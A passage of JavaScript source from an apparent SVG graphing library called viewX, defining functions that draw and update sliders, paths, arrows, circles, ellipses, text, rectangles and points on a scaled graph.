gdata.svgElement.appendChild(sliderbaseElement);
var sliderfillElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
sliderfillElement.setAttribute('x1', viewX.graphToScaledX(slideroptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
sliderfillElement.setAttribute('y1', viewX.graphToScaledY(slideroptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
sliderfillElement.setAttribute('x2', viewX.graphToScaledX(slideroptions.cx, gdata.xmin, gdata.xmax, aratio) + '%')
sliderfillElement.setAttribute('y2', viewX.graphToScaledY(slideroptions.cy, gdata.ymin, gdata.ymax, aratio) + '%');
sliderfillElement.setAttribute('id', graphname + '-slider-fill-' + slidername)
sliderfillElement.setAttribute('vector-effect','non-scaling-stroke');
sliderfillElement.style.stroke = slideroptions.sliderfillcolor
sliderfillElement.style.strokeWidth = slideroptions.strokewidth + '%';
gdata.svgElement.appendChild(sliderfillElement);
rx = viewX.distanceBTWgraphToSvg([0,0],[slideroptions.knobradius, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, slideroptions.knobradius], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
slideroptions.automaticallySetKnobRadius = slideroptions.automaticallySetKnobRadius || 'yes'
if (slideroptions.automaticallySetKnobRadius == 'yes') {
// Adjusted based on certain calculations at https://www.desmos.com/calculator/wocvdzcn1p
aRegress = -1.2979*Math.pow(10, -9);
bRegress = -9.8036
cRegress = -0.0337978
fRegress = 10.1808
strokeW = options.strokewidth
if (strokeW < 25) {
rx = ((aRegress*strokeW) + bRegress)*(Math.exp(cRegress*strokeW)) + fRegress
ry = rx
}
else {
rx = 0.2217*strokeW + 0.736503
ry = rx
}
}
var circleElement = document.createElementNS("http://www.w3.org/2000/svg", 'ellipse');
circleElement.setAttribute('cx', viewX.graphToScaledX(slideroptions.cx, gdata.xmin, gdata.xmax, aratio) + '%');
circleElement.setAttribute('cy', viewX.graphToScaledY(slideroptions.cy, gdata.ymin, gdata.ymax, aratio) + '%');
circleElement.setAttribute('rx', rx + '%')
circleElement.setAttribute('ry', ry + '%');
circleElement.setAttribute('id', graphname + '-slider-knob-' + slidername)
viewX.uid = viewX.uid + 1
circleElement.setAttribute('vector-effect','non-scaling-stroke');
circleElement.style.fill = slideroptions.sliderknobcolor
circleElement.style.strokeWidth = '0%';
gdata.svgElement.appendChild(circleElement);
viewX.graphData[graphname].sliderData[slidername] = [sliderbaseElement,sliderfillElement, circleElement, slideroptions]
return [sliderbaseElement,sliderfillElement, circleElement, slideroptions]
}
viewX.sliderDivData = {}
viewX.addSliderToDiv = function(holderName, slidername, slideroptions) {
slideroptions = slideroptions || {}
slideroptions.classname = slideroptions.classname || 'standardSlider'
var sliderinputElement = document.createElement("input");
sliderinputElement.type = 'range';
sliderinputElement.setAttribute('min', slideroptions.min);
sliderinputElement.setAttribute('max', slideroptions.max);
sliderinputElement.setAttribute('step', slideroptions.step);
sliderinputElement.setAttribute('value', slideroptions.value);
sliderinputElement.setAttribute('id', slidername);
sliderinputElement.setAttribute('class', slideroptions.classname);
sliderinputElement.setAttribute('oninput', slideroptions.eventFunction);
holderDiv = document.getElementById(holderName)
holderDiv.appendChild(sliderinputElement);
sliderinputElement.style.width = slideroptions.w;
sliderinputElement.style.height = slideroptions.h;
sliderinputElement.style.backgroundColor = slideroptions.sliderbasecolor
viewX.sliderDivData[slidername] = [holderDiv, slidername, slideroptions]
return [slidername, holderDiv]
}
viewX.divSlider = function(holder, divslidername, minval, maxval, currvalue, stepval, eventfunc, widthval, heightval, sliderTrackColor, thumbSize, thumbColor) {
options = {}
options.min = minval
options.max = maxval
options.value = currvalue
options.step = stepval
options.eventFunction = eventfunc
options.w = widthval
options.h = heightval
options.sliderbasecolor = sliderTrackColor
// options.classname = sliderClass
$('<style>#' + divslidername + '::-webkit-slider-thumb {-webkit-appearance: none; appearance: none;width: ' + thumbSize + ';height: ' + thumbSize + ';border-radius: 50%; background: ' + thumbColor + ';cursor: pointer; } #' + divslidername + '::-moz-slider-thumb {appearance: none;width: ' + thumbSize + ';height: ' + thumbSize + ';border-radius: 50%; background: ' + thumbColor + ';cursor: pointer; }</style>').appendTo('head');
viewX.addSliderToDiv(holder, divslidername, options)
}
viewX.addPath = function(graphname, pathname, pathoptions) {
gdata = viewX.graphData[graphname]
pathoptions = pathoptions || {}
aratio = gdata.aspectratio
pathoptions.points = pathoptions.points || [[0, 1], [1, 0]]
pathstring = 'M'
for (pth = 0; pth < pathoptions.points.length; pth++) {
if (pth == 0) {
pathstring = pathstring + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
else {
pathstring = pathstring + 'L' + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
}
pathoptions.name = pathname || viewX.uid
pathoptions.strokewidth = pathoptions.strokewidth || 1
pathoptions.pathcolor = pathoptions.pathcolor || 'hsla(190, 100%, 50%, 1)'
pathoptions.pathfillcolor = pathoptions.pathfillcolor || 'none'
var pathElement = document.createElementNS("http://www.w3.org/2000/svg", 'path');
try {
pathElement.setAttribute('d', pathstring);
pathElement.setAttribute('id', graphname + '-path-' + pathname)
viewX.uid = viewX.uid + 1
pathElement.style.stroke = pathoptions.pathcolor
pathElement.style.fill = pathoptions.pathfillcolor;
pathElement.style.strokeWidth = pathoptions.strokewidth + '%';
gdata.svgElement.appendChild(pathElement);
viewX.graphData[graphname].pathData[pathname] = [pathElement, pathoptions]
return [pathElement, pathoptions]
}
catch (err){
console.log("Could plot path points.", pathoptions.points)
}
}
viewX.addArrow = function(graphname, arrowname, arrowoptions) {
gdata = viewX.graphData[graphname]
arrowoptions = arrowoptions || {}
aratio = gdata.aspectratio
arrowoptions.strokewidth = arrowoptions.strokewidth || 0.4
arrowoptions.from = arrowoptions.from || [0, 0];
arrowoptions.to = arrowoptions.to || [1, 1];
arrowFrom = [viewX.graphToScaledX(arrowoptions.from[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.from[1], gdata.ymin, gdata.ymax, aratio)]
arrowTo = [viewX.graphToScaledX(arrowoptions.to[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.to[1], gdata.ymin, gdata.ymax, aratio)]
arrowstring = 'M'
arrowstring = arrowstring + arrowFrom[0] + ' ' + arrowFrom[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowDirectionVector = viewX.directionVec(arrowTo, arrowFrom);
arrowHeadSize = Math.max(3*arrowoptions.strokewidth, 2);
arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, -35);
arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, 35);
arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowoptions.name = arrowname || viewX.uid;
arrowoptions.arrowcolor = arrowoptions.arrowcolor || 'hsla(0, 0%, 0%, 1)';
var arrowElement = document.createElementNS("http://www.w3.org/2000/svg", 'path');
try {
arrowElement.setAttribute('d', arrowstring);
arrowElement.setAttribute('id', graphname + '-arrow-' + arrowname);
viewX.uid = viewX.uid + 1;
arrowElement.style.stroke = arrowoptions.arrowcolor;
arrowElement.style.fill = 'none';
arrowElement.style.strokeWidth = arrowoptions.strokewidth + '%';
gdata.svgElement.appendChild(arrowElement);
viewX.graphData[graphname].arrowData[arrowname] = [arrowElement, arrowoptions]
return [arrowElement, arrowoptions]
}
catch (err){
console.log("Could plot arrow points.", arrowoptions.points)
}
}
viewX.updateArrow = function(graphname, arrowname, newarrowoptions) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio;
arrowoptions = gdata.arrowData[arrowname][1]
arrowElement = gdata.arrowData[arrowname][0]
arrowoptions.points = newarrowoptions.points || arrowoptions.points
arrowoptions.strokewidth = newarrowoptions.strokewidth || arrowoptions.strokewidth
arrowoptions.from = newarrowoptions.from || arrowoptions.from;
arrowoptions.to = newarrowoptions.to || arrowoptions.to;
arrowFrom = [viewX.graphToScaledX(arrowoptions.from[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.from[1], gdata.ymin, gdata.ymax, aratio)]
arrowTo = [viewX.graphToScaledX(arrowoptions.to[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.to[1], gdata.ymin, gdata.ymax, aratio)]
arrowstring = 'M'
arrowstring = arrowstring + arrowFrom[0] + ' ' + arrowFrom[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowDirectionVector = viewX.directionVec(arrowTo, arrowFrom);
arrowHeadSize = Math.max(3*arrowoptions.strokewidth, 2);
arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, -35);
arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, 35);
arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
try {
arrowElement.setAttribute('d', arrowstring);
arrowoptions.arrowcolor = newarrowoptions.arrowcolor || arrowoptions.arrowcolor
arrowElement.style.stroke = arrowoptions.arrowcolor
arrowElement.style.fill = 'none'
arrowElement.style.strokeWidth = arrowoptions.strokewidth + '%';
viewX.graphData[graphname].arrowData[arrowname] = [arrowElement, arrowoptions]
}
catch (err){
console.log("Arrow points Error", newarrowoptions.points)
}
}
viewX.updatePath = function(graphname, pathname, newpathoptions) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
pathoptions = gdata.pathData[pathname][1]
pathElement = gdata.pathData[pathname][0]
pathoptions.points = newpathoptions.points || pathoptions.points
pathstring = 'M'
for (pth = 0; pth < pathoptions.points.length; pth++) {
if (pth == 0) {
pathstring = pathstring + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
else {
pathstring = pathstring + 'L' + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
}
try {
pathElement.setAttribute('d', pathstring);
pathoptions.strokewidth = newpathoptions.strokewidth || pathoptions.strokewidth
pathoptions.pathcolor = newpathoptions.pathcolor || pathoptions.pathcolor
pathoptions.pathfillcolor = newpathoptions.pathfillcolor || pathoptions.pathfillcolor
pathElement.style.stroke = pathoptions.pathcolor
pathElement.style.fill = pathoptions.pathfillcolor
pathElement.style.strokeWidth = pathoptions.strokewidth + '%';
viewX.graphData[graphname].pathData[pathname] = [pathElement, pathoptions]
}
catch (err){
console.log("Path points Error", newpathoptions.points)
}
}
viewX.updatePathPoints = function(graphname, pathname, npathpoints) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
pathoptions = gdata.pathData[pathname][1]
pathElement = gdata.pathData[pathname][0]
pathoptions.points = npathpoints || pathoptions.points
if (pathoptions.points.length > 0) {
pathstring = 'M'
for (pth = 0; pth < pathoptions.points.length; pth++) {
if (pth == 0) {
pathstring = pathstring + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
else {
pathstring = pathstring + 'L' + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
}
try {
pathElement.setAttribute('d', pathstring);
viewX.graphData[graphname].pathData[pathname] = [pathElement, pathoptions]
return [pathElement, pathoptions]
}
catch (err){
console.log(npathpoints)
}
}
}
viewX.distanceBTWgraphToSvg = function(p1, p2, xmin, xmax, ymin, ymax, aspectratio) {
pt1 = [viewX.graphToScaledX(p1[0], xmin, xmax, aspectratio), viewX.graphToScaledY(p1[1], ymin, ymax, aspectratio)]
pt2 = [viewX.graphToScaledX(p2[0], xmin, xmax, aspectratio), viewX.graphToScaledY(p2[1], ymin, ymax, aspectratio)]
return Math.pow(Math.pow(pt1[0] - pt2[0], 2) + Math.pow(pt1[1] - pt2[1], 2), 0.5)
}
viewX.addCircle = function(graphname, circlename, circleoptions) {
gdata = viewX.graphData[graphname]
circleoptions = circleoptions || {}
aratio = gdata.aspectratio
if (circleoptions.x != 0) {
circleoptions.x = circleoptions.x || 0.3
}
else {
circleoptions.x = 0
}
if (circleoptions.y != 0) {
circleoptions.y = circleoptions.y || 0.3
}
else {
circleoptions.y = 0
}
if (circleoptions.radius != 0) {
circleoptions.radius = circleoptions.radius || 0.3
}
else {
circleoptions.radius = 0
}
circleoptions.name = circlename || viewX.uid
circleoptions.stroke = circleoptions.stroke || 'hsla(190, 100%, 50%, 0.5)'
circleoptions.strokewidth = circleoptions.strokewidth || 0.1
circleoptions.circlecolor = circleoptions.circlecolor || 'hsla(190, 100%, 50%, 1)'
rx = viewX.distanceBTWgraphToSvg([0,0],[circleoptions.radius, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, circleoptions.radius], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
var circleElement = document.createElementNS("http://www.w3.org/2000/svg", 'ellipse');
circleElement.setAttribute('cx', viewX.graphToScaledX(circleoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
circleElement.setAttribute('cy', viewX.graphToScaledY(circleoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
circleElement.setAttribute('rx', rx + '%')
circleElement.setAttribute('ry', ry + '%');
circleElement.setAttribute('id', graphname + '-circle-' + circlename)
viewX.uid = viewX.uid + 1
circleElement.setAttribute('vector-effect','non-scaling-stroke');
circleElement.style.fill = circleoptions.circlecolor
circleElement.style.strokeWidth = circleoptions.strokewidth + '%';
circleElement.style.stroke = circleoptions.stroke;
circleElement.setAttribute('stroke-dasharray', circleoptions.strokedasharray);
gdata.svgElement.appendChild(circleElement);
viewX.graphData[graphname].circleData[circlename] = [circleElement, circleoptions]
return [circleElement, circleoptions]
}
viewX.updateCircle = function(graphname, circlename, circlenewvalues) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
circleoptions = gdata.circleData[circlename][1]
circleElement = gdata.circleData[circlename][0]
if (circleoptions.x != 0) {
circleoptions.x = circlenewvalues.x || circleoptions.x
}
else {
circleoptions.x = circlenewvalues.x
}
if (circleoptions.y != 0) {
circleoptions.y = circlenewvalues.y || circleoptions.y
}
else {
circleoptions.y = circlenewvalues.y
}
if (circleoptions.radius != 0) {
circleoptions.radius = circlenewvalues.radius || circleoptions.radius
}
else {
circleoptions.radius = circlenewvalues.radius
}
circleoptions.name = circlename || viewX.uid
circleoptions.stroke = circlenewvalues.stroke || circleoptions.stroke
circleoptions.strokewidth = circlenewvalues.strokewidth || circleoptions.strokewidth
circleoptions.circlecolor = circlenewvalues.circlecolor || circleoptions.circlecolor
rx = viewX.distanceBTWgraphToSvg([0,0],[circleoptions.radius, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, circleoptions.radius], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
circleElement.setAttribute('cx', viewX.graphToScaledX(circleoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
circleElement.setAttribute('cy', viewX.graphToScaledY(circleoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
circleElement.setAttribute('rx', rx + '%')
circleElement.setAttribute('ry', ry + '%');
circleElement.setAttribute('id', graphname + '-circle-' + circlename)
viewX.uid = viewX.uid + 1
circleElement.setAttribute('vector-effect','non-scaling-stroke');
circleElement.style.fill = circleoptions.circlecolor
circleElement.style.strokeWidth = circleoptions.strokewidth + '%';
circleElement.style.stroke = circleoptions.stroke;
circleElement.setAttribute('stroke-dasharray', circleoptions.strokedasharray);
viewX.graphData[graphname].circleData[circlename] = [circleElement, circleoptions]
}
viewX.addEllipse = function(graphname, ellipsename, ellipseoptions) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
ellipseoptions = ellipseoptions || {}
ellipseoptions.x = parseFloat(ellipseoptions.x.toString() || 0)
ellipseoptions.y = parseFloat(ellipseoptions.y.toString() || 0)
ellipseoptions.rx = parseFloat(ellipseoptions.rx.toString() || 0.3)
ellipseoptions.ry = parseFloat(ellipseoptions.ry.toString() || 8)
ellipseoptions.name = ellipsename || viewX.uid
ellipseoptions.stroke = ellipseoptions.stroke || 'hsla(190, 100%, 50%, 0.5)'
ellipseoptions.strokewidth = ellipseoptions.strokewidth || 0.1
ellipseoptions.ellipsecolor = ellipseoptions.ellipsecolor || 'hsla(190, 100%, 50%, 1)'
rx = viewX.distanceBTWgraphToSvg([0,0],[ellipseoptions.rx, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, ellipseoptions.ry], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
var ellipseElement = document.createElementNS("http://www.w3.org/2000/svg", 'ellipse');
ellipseElement.setAttribute('cx', viewX.graphToScaledX(ellipseoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
ellipseElement.setAttribute('cy', viewX.graphToScaledY(ellipseoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
ellipseElement.setAttribute('rx', rx + '%')
ellipseElement.setAttribute('ry', ry + '%');
ellipseElement.setAttribute('id', graphname + '-ellipse-' + ellipsename)
viewX.uid = viewX.uid + 1
ellipseElement.setAttribute('vector-effect','non-scaling-stroke');
ellipseElement.style.fill = ellipseoptions.ellipsecolor
ellipseElement.style.strokeWidth = ellipseoptions.strokewidth + '%';
ellipseElement.style.stroke = ellipseoptions.stroke;
gdata.svgElement.appendChild(ellipseElement);
viewX.graphData[graphname].ellipseData[ellipsename] = [ellipseElement, ellipseoptions]
return [ellipseElement, ellipseoptions]
}
viewX.updateEllipse = function(graphname, ellipsename, ellipsenewvalues) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
ellipseoptions = gdata.ellipseData[ellipsename][1]
ellipseElement = gdata.ellipseData[ellipsename][0]
if (ellipseoptions.x != 0) {
ellipseoptions.x = ellipsenewvalues.x || ellipseoptions.x
}
else {
ellipseoptions.x = 0
}
if (ellipseoptions.y != 0) {
ellipseoptions.y = ellipsenewvalues.y || ellipseoptions.y
}
else {
ellipseoptions.y = 0
}
if (ellipseoptions.rx != 0) {
ellipseoptions.rx = ellipsenewvalues.rx || ellipseoptions.rx
}
else {
ellipseoptions.rx = 0
}
if (ellipseoptions.ry != 0) {
ellipseoptions.ry = ellipsenewvalues.ry || ellipseoptions.ry
}
else {
ellipseoptions.ry = 0
}
ellipseoptions.name = ellipsename || viewX.uid
ellipseoptions.stroke = ellipsenewvalues.stroke || ellipseoptions.stroke
ellipseoptions.strokewidth = ellipsenewvalues.strokewidth || ellipseoptions.strokewidth
ellipseoptions.ellipsecolor = ellipsenewvalues.ellipsecolor || ellipseoptions.ellipsecolor
rx = viewX.distanceBTWgraphToSvg([0,0],[ellipseoptions.rx, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, ellipseoptions.ry], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ellipseElement.setAttribute('cx', viewX.graphToScaledX(ellipseoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
ellipseElement.setAttribute('cy', viewX.graphToScaledY(ellipseoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
ellipseElement.setAttribute('rx', rx + '%')
ellipseElement.setAttribute('ry', ry + '%');
ellipseElement.setAttribute('id', graphname + '-ellipse-' + ellipsename)
viewX.uid = viewX.uid + 1
ellipseElement.setAttribute('vector-effect','non-scaling-stroke');
ellipseElement.style.fill = ellipseoptions.ellipsecolor
ellipseElement.style.strokeWidth = ellipseoptions.strokewidth + '%';
ellipseElement.style.stroke = ellipseoptions.stroke;
gdata.svgElement.appendChild(ellipseElement);
viewX.graphData[graphname].ellipseData[ellipsename] = [ellipseElement, ellipseoptions]
}
viewX.addText = function(graphname, textname, textoptions) {
gdata = viewX.graphData[graphname]
textoptions = textoptions || {}
aratio = gdata.aspectratio
textoptions.x = parseFloat(textoptions.x.toString() || 0)
textoptions.y = parseFloat(textoptions.y.toString() || 0)
textoptions.text = textoptions.text || ''
textoptions.name = textname || viewX.uid
textoptions.textAlign = textoptions.textAlign || 'left'
textoptions.fontSize = textoptions.fontSize || 12
textoptions.fontFamily = textoptions.fontFamily || 'Source Sans Pro'
textoptions.textcolor = textoptions.textcolor || 'hsla(190, 100%, 0%, 1)'
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
textElement.setAttribute('x', viewX.graphToScaledX(textoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
textElement.setAttribute('y', viewX.graphToScaledY(textoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
textElement.setAttribute('id', graphname + '-text-' + textname)
viewX.uid = viewX.uid + 1
textElement.setAttribute('vector-effect','non-scaling-stroke');
textElement.style.fill = textoptions.textcolor
textElement.innerHTML = textoptions.text
textElement.style.fontFamily = textoptions.fontFamily
textElement.style.fontSize = textoptions.fontSize;
if (textoptions.textAlign == 'center') {
textElement.setAttribute('text-anchor','middle')
}
gdata.svgElement.appendChild(textElement);
viewX.graphData[graphname].textData[textname] = [textElement, textoptions]
return [textElement, textoptions]
}
viewX.updateText = function(graphname, textname, textvalues) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
textoptions = gdata.textData[textname][1]
textElement = gdata.textData[textname][0]
textoptions.text = textvalues.text || textoptions.text
textoptions.x = textvalues.x || textoptions.x
textoptions.y = textvalues.y || textoptions.y
textoptions.textcolor = textvalues.textcolor || textoptions.textcolor
textoptions.fontSize = textvalues.fontSize || textoptions.fontSize
textElement.innerHTML = textoptions.text
textElement.setAttribute('x', viewX.graphToScaledX(textoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
textElement.setAttribute('y', viewX.graphToScaledY(textoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
textElement.style.fill = textoptions.textcolor
textElement.style.fontSize = textoptions.fontSize;
viewX.graphData[graphname].textData[textname] = [textElement, textoptions]
return [textElement, textoptions]
}
viewX.addRectangle = function(graphname, rectname, rectoptions) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
rectoptions = rectoptions || {}
rectoptions.x = parseFloat(rectoptions.x.toString() || 0)
rectoptions.y = parseFloat(rectoptions.y.toString() || 0)
rectoptions.w = parseFloat(rectoptions.w.toString() || 1)
rectoptions.h = parseFloat(rectoptions.h.toString() || 1)
rectoptions.name = rectname || viewX.uid
rectoptions.stroke = rectoptions.stroke || 'hsla(190, 100%, 50%, 0.5)'
rectoptions.strokewidth = rectoptions.strokewidth || 0.1
rectoptions.strokedasharray = rectoptions.strokedasharray || ""
rectoptions.rectcolor = rectoptions.rectcolor || 'hsla(190, 100%, 50%, 1)'
rx = viewX.distanceBTWgraphToSvg([0,0],[rectoptions.w, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, rectoptions.h], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
var rectElement = document.createElementNS("http://www.w3.org/2000/svg", 'rect');
rectElement.setAttribute('x', viewX.graphToScaledX(rectoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
rectElement.setAttribute('y', viewX.graphToScaledY(rectoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
rectElement.setAttribute('width', rx + '%')
rectElement.setAttribute('height', ry + '%');
rectElement.setAttribute('id', graphname + '-rect-' + rectname)
viewX.uid = viewX.uid + 1
rectElement.setAttribute('vector-effect','non-scaling-stroke');
rectElement.style.fill = rectoptions.rectcolor
rectElement.style.strokeWidth = rectoptions.strokewidth + '%';
rectElement.style.stroke = rectoptions.stroke;
rectElement.setAttribute('stroke-dasharray', rectoptions.strokedasharray);
gdata.svgElement.appendChild(rectElement);
viewX.graphData[graphname].rectData[rectname] = [rectElement, rectoptions]
return [rectElement, rectoptions]
}
viewX.updateRectangle = function(graphname, rectname, rectvalueupdate) {
gdata = viewX.graphData[graphname]
rectoptions = gdata.rectData[rectname][1]
rectElement = gdata.rectData[rectname][0]
aratio = gdata.aspectratio
if (rectvalueupdate.x != 0) {
rectoptions.x = rectvalueupdate.x || rectoptions.x
}
else {
rectoptions.x = rectvalueupdate.x
}
if (rectvalueupdate.y != 0) {
rectoptions.y = rectvalueupdate.y || rectoptions.y
}
else {
rectoptions.y = rectvalueupdate.y
}
if (rectvalueupdate.w != 0) {
rectoptions.w = rectvalueupdate.w || rectoptions.w
}
else {
rectoptions.w = rectvalueupdate.w
}
if (rectvalueupdate.h != 0) {
rectoptions.h = rectvalueupdate.h || rectoptions.h
}
else {
rectoptions.h = rectvalueupdate.h
}
rectoptions.stroke = rectvalueupdate.stroke || rectoptions.stroke
rectoptions.strokewidth = rectvalueupdate.strokewidth || rectoptions.strokewidth
rectoptions.rectcolor = rectvalueupdate.rectcolor || rectoptions.rectcolor
rx = viewX.distanceBTWgraphToSvg([0,0],[rectoptions.w, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, rectoptions.h], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
rectElement.setAttribute('x', viewX.graphToScaledX(rectoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
rectElement.setAttribute('y', viewX.graphToScaledY(rectoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
rectElement.setAttribute('width', rx + '%')
rectElement.setAttribute('height', ry + '%');
rectElement.style.fill = rectoptions.rectcolor
rectElement.style.strokeWidth = rectoptions.strokewidth + '%';
rectElement.style.stroke = rectoptions.stroke;
viewX.graphData[graphname].rectData[rectname] = [rectElement, rectoptions]
}
viewX.addPoint = function(graphname, pointname, pointoptions) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
pointoptions = pointoptions || {}
if (pointoptions.x != 0) {
pointoptions.x = pointoptions.x || 0.3
}
if (pointoptions.y != 0) {
pointoptions.y = pointoptions.y || 0.3
}
// pointoptions.y = pointoptions.y || 0.3
pointoptions.pointsize = pointoptions.pointsize || 0.7
pointoptions.name = pointname || viewX.uid
pointoptions.pointcolor = pointoptions.pointcolor || 'hsla(190, 100%, 50%, 1)'
var pointElement = document.createElementNS("http://www.w3.org/2000/svg", 'ellipse');
pointElement.setAttribute('cx', viewX.graphToScaledX(pointoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
pointElement.setAttribute('cy', viewX.graphToScaledY(pointoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
pointElement.setAttribute('rx', pointoptions.pointsize + '%')
pointElement.setAttribute('ry', pointoptions.pointsize + '%');
pointElement.setAttribute('id', graphname + '-point-' + pointname)
viewX.uid = viewX.uid + 1
